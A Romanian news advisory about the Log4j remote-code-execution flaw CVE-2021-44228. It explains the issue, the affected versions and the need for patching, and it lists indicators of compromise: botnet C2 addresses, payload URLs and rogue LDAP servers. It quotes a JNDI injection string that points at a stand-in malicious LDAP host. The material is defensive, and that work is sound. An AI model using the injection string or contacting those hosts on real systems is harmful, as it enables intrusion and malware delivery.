Vulnerabilitate critică de tip zero-day afectează Log4j, o bibliotecă Java utilizată la scară largă
Vulnerabilitate critică de tip zero-day afectează Log4j, o bibliotecă Java utilizată la scară largă
O vulnerabilitate critică (0-day) într-o bibliotecă populară Java, numită „Log4j”, poate fi exploatată liber de atacatori. La momentul divulgării publice a informației, nu era disponibil niciun patch de securitate pentru a o remedia, dar între timp au apărut o serie de măsuri de atenuare.
UPDATE: Marea majoritate a activităților observate au fost reprezentate de scanări, dar au fost observate deopotrivă activități de exploatare și post-exploatare. În funcție de natura vulnerabilității, odată ce atacatorul are acces deplin și control al unei aplicații, acesta poate îndeplini o multitudine de obiective. Echipa de securitate Microsoft a observat activități precum instalarea de software dedicat minării de criptomonede, Cobalt Strike - pentru a permite furtul de credențiale – dar și activități de mișcare laterală și extragerea datelor din sistemele compromise.
Pentru că există o arie largă de exploatare a rețelei prin această vulnerabilitate și a faptului că aplicarea holistică a măsurilor de atenuare va necesita timp, este încurajată căutarea semnelor de post-exploatare. Bazarea exclusiv pe măsuri de prevenire nu este suficientă.
Surse pentru monitorizarea indicatorilor de compromitere (IOCs)
O vulnerabilitate critică (0-day) într-o bibliotecă populară Java, numită „Log4j”, poate fi exploatată liber de atacatori. La momentul divulgării publice a informației, nu era disponibil niciun patch de securitate pentru a o remedia, dar între timp au apărut o serie de măsuri de atenuare.
Dezvoltată și întreținută de Apache, biblioteca este adoptată pe scară largă și utilizată în multe produse software comerciale și open-source ca un framework de înregistrare a informațiilor pentru Java.
Descriere
Severitatea vulnerabilității (CVE-2021-44228) este una ridicată, deoarece aceasta poate fi exploatată de la distanță de un atacator neautentificat prin executarea codului (remote code execution – RCE). Mai mult, CVE-2021-44228 are un scor de 10 (din 10) în sistemul comun de notare a vulnerabilității (CVSS).
Problema de securitate provine din modul în care mesajele jurnal sunt gestionate de procesorul log4j. În cazul în care un atacator trimite un mesaj special conceput (care conține un șir de caractere cum ar fi $-jndi:ldap://rogueldapserver.com/a}), acest lucru poate duce la încărcarea unei clase de coduri externe sau a căutării mesajelor și la executarea codului respectiv, ceea ce duce la o situație cunoscută sub numele de execuție de cod de la distanță.
Impact
Cu toate că vulnerabilitatea are un grad de complexitate ridicat, exploatarea sa cu succes depinde de mai multe condiții, cum ar fi utilizarea JVM, configurația reală, etc. Versiunile log4j între 2.0 și 2.14.1 sunt afectate.
Deoarece mulți furnizori terți se bazează pe Log4j pentru produsele lor, s-a lucrat intens pentru lansarea unor patch-uri dedicate acestora. În ultimele 48 de ore, mulți furnizori au publicat astfel de patch-uri de securitate.
Remediere
Recomandăm verificarea urgentă a folosirii Log4j în software-ul utilizat și aplicarea patch-urilor corespunzătoare cât mai curând posibil. În cazul în care nu se pot aplica patch-uri, este indicată luarea oricărei măsuri de atenuare, pentru a evita alte daune.
nazi.uy # Mirai botnet C2
log.exposedbotnets.ru # Tsunami botnet C2
194.59.165.21:8080 # Tsunami botnet C2
195.133.40.15:25565 # Mirai botnet C2
185.154.53.140:80 # Kinsing botnet C2
138.197.206.223:80 # Kinsing payload delivery server
18.228.7.109:80 # Kinsing payload delivery server
82.118.18.201:80 # Kinsing payload delivery server
92.242.40.21:80 # Kinsing payload delivery server
185.191.32.198:80 # Kinsing payload delivery server
80.71.158.12:80 # Kinsing payload delivery server
185.191.32.198:80 # Kinsing payload delivery server
45.137.155.55:80 # Kinsing payload delivery server
185.191.32.198:80 # Kinsing payload delivery server
45.137.155.55:80 # Kinsing payload delivery server
62.210.130.250:80 # Mirai payload delivery server
http://210.141.105.67/wp-content/themes/twentythirteen/m8 # Kinsing payload URL
http://159.89.182.117/wp-content/themes/twentyseventeen/ldm # Kinsing payload URL
45.130.229.168:1389 # Rogue LDAP server
82.118.18.201:1534 # Rogue LDAP server
45.130.229.168:1389 # Rogue LDAP server
185.250.148.157:1389 # Rogue LDAP server
92.242.40.21:5557 # Rogue LDAP server
205.185.115.217:47324 # Rogue LDAP server
163.172.157.143:1389 # Rogue LDAP server
45.155.205.233:12344 # Rogue LDAP server
Citește și:
- 21:33 - Istvan Kovacs arbitrează derby-ul Rapid – Dinamo. CCA trimite o brigadă de nivel Champions League în Giulești
- 21:21 - Ediția anului ”Culisele Statului Paralel"! Călin Georgescu revine în studioul Realitatea PLUS, față în față cu Anca Alexandrescu. Duminică, ora 20:55 - VIDEO
- 20:37 - Declarație incendiară a lui Trump în ziua 14 a războiului cu Iranul: „Este o onoare să ucid lideri iranieni”
- 19:49 - Trenuri electrice noi pe rutele lungi din România. Călătoria București – Timișoara durează aproximativ 12 ore
Mai multe articole despre
Urmărește știrile Realitatea de Alba și pe Google News
